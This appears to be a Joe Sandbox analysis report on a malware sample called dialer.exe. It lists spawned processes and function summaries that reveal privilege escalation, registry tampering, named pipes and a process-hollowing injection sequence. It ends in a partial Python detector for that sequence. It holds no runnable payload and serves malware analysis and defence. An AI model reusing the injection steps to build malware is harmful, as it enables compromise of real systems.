                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                    Imagebase:0x7ff63b2c0000
                                                                                                                                                                                                    File size:468'120 bytes
                                                                                                                                                                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:127
                                                                                                                                                                                                    Start time:14:00:33
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:128
                                                                                                                                                                                                    Start time:14:00:34
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:129
                                                                                                                                                                                                    Start time:14:00:34
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:130
                                                                                                                                                                                                    Start time:14:00:35
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:ctfmon.exe
                                                                                                                                                                                                    Imagebase:0x7ff63dcc0000
                                                                                                                                                                                                    File size:11'264 bytes
                                                                                                                                                                                                    MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:131
                                                                                                                                                                                                    Start time:14:00:36
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dasHost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:dashost.exe {56d287c9-3fb8-41cd-a9e100d94de470c6}
                                                                                                                                                                                                    Imagebase:0x7ff6003f0000
                                                                                                                                                                                                    File size:98'816 bytes
                                                                                                                                                                                                    MD5 hash:2857A196985FC58A74C337B5E95B2174
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:132
                                                                                                                                                                                                    Start time:14:00:37
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:133
                                                                                                                                                                                                    Start time:14:00:38
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:134
                                                                                                                                                                                                    Start time:14:00:39
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                    Imagebase:0x7ff71ebd0000
                                                                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:135
                                                                                                                                                                                                    Start time:14:00:53
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:136
                                                                                                                                                                                                    Start time:14:00:54
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff66aaa0000
                                                                                                                                                                                                    File size:103'288 bytes
                                                                                                                                                                                                    MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:137
                                                                                                                                                                                                    Start time:14:00:56
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff66aaa0000
                                                                                                                                                                                                    File size:103'288 bytes
                                                                                                                                                                                                    MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:138
                                                                                                                                                                                                    Start time:14:01:17
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff66aaa0000
                                                                                                                                                                                                    File size:103'288 bytes
                                                                                                                                                                                                    MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

Target ID: 139
Start time: 14:01:25
Start date: 14/03/2024
Path: C:\Windows\System32\dllhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Imagebase: 0x7ff6e9610000
File size: 21'312 bytes
MD5 hash: 08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 46.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 67%
Total number of Nodes: 227
Total number of Limit Nodes: 24

Control-flow Graph

Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
• String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
• API String ID: 1970497257-1130149537
• Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
• Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
• Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
• Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
• String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
• API String ID: 2998269048-3753927220
• Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
• Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
• Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
• Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
• String ID:
• API String ID: 2219672174-0
• Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
• Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
• Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
• Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
• RtlAllocateHeap.NTDLL(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
  • Part of subcall function 00000001400014D8: FindCloseChangeNotification.KERNELBASE ref: 000000014000161D
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
  • Part of subcall function 00000001400014D8: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000014000163D
  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
  • Part of subcall function 00000001400014D8: RtlRestoreThreadPreferredUILanguages.NTDLL ref: 0000000140001651
• OpenProcess.KERNEL32 ref: 0000000140001859
• TerminateProcess.KERNEL32 ref: 000000014000186C
• CloseHandle.KERNEL32 ref: 0000000140001875
• GetProcessHeap.KERNEL32 ref: 0000000140001885
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
• String ID:
• API String ID: 3158079169-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
• String ID: .text$C:\Windows\System32\
• API String ID: 1125510917-832442975
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
• String ID: M$\\.\pipe\dialerchildproc64
• API String ID: 2203880229-3489460547
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
• String ID: \\.\pipe\dialercontrol_redirect64
• API String ID: 2071455217-3440882674
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3676546796-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph not reproduced; basic blocks 1400018ac-140001912; calls OpenProcess, IsWow64Process, FindCloseChangeNotification
APIs
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: Process$ChangeCloseFindNotificationOpenWow64
• String ID:
• API String ID: 3805842350-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph not reproduced; basic blocks 140002258-140002263; subcall 14000226c, then ExitProcess
APIs
  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
  • Part of subcall function 000000014000226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
  • Part of subcall function 000000014000226C: FindResourceA.KERNEL32 ref: 000000014000232F
  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
• ExitProcess.KERNEL32 ref: 0000000140002263
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
• String ID:
• API String ID: 2373407002-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Graph not reproduced; basic blocks 140002560-140002a8e; calls GetProcessHeap, HeapAlloc, K32EnumProcesses, ReadFile, ExitProcess, RegOpenKeyExW, RegDeleteValueW, ShellExecuteW, HeapFree, lstrlenW; subcalls 14000175c, 1400018ac, 1400010c0, 1400019c4, 140001000, 1400017ec, 140001944, 14000217c, 1400021a8, 1400014d8, 140002a90, 1400016cc, 140001c88
APIs
Strings
Memory Dump Source
• Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
Similarity
• API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
• String ID: SOFTWARE$dialerstager$open
• API String ID: 4281403370-3931493855
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

[graph rendering removed; the raw node listing is not readable as text. Recoverable API call order on the success path of the function at 140001c88: CreateProcessW -> VirtualAllocEx -> WriteProcessMemory -> WriteProcessMemory (loop) -> VirtualAlloc -> GetThreadContext -> WriteProcessMemory -> SetThreadContext -> ResumeThread. Failure path (from 140001e5d): OpenProcess -> TerminateProcess.]
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                      • API String ID: 3462610200-2766056989
                                                                                                                                                                                                      • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                                                                                                      • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%
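The function above is the sample's injector: the control-flow graph shows CreateProcessW, VirtualAllocEx, a loop of WriteProcessMemory calls, then GetThreadContext, WriteProcessMemory, SetThreadContext and ResumeThread, with OpenProcess and TerminateProcess on the failure path. A triage script can turn that ordered API list into a verdict. The following is an added example, not code from the Joe Sandbox report and not one of its signatures: the call sequence is transcribed from the graph above, and the pattern table plus the ATT&CK sub-technique mapping are the example's own assumptions.

```python
"""Classify an ordered API call sequence against process-injection patterns.

Added example (not part of the Joe Sandbox report, not a Joe Sandbox signature).
The input sequence is transcribed from the report's control-flow graph of the
function at 0x140001c88; the pattern table and the ATT&CK sub-technique mapping
are this example's own assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass

# Call order read off the CFG edges in the report: CreateProcessW -> VirtualAllocEx
# -> WriteProcessMemory (one write, then a loop of writes) -> VirtualAlloc ->
# GetThreadContext -> WriteProcessMemory -> SetThreadContext -> ResumeThread.
# OpenProcess/TerminateProcess sit on the failure path (node 140001e5d) and kill
# the half-built child. Constructed from the graph, not from a live API trace.
DIALER_INJECT_SEQUENCE = [
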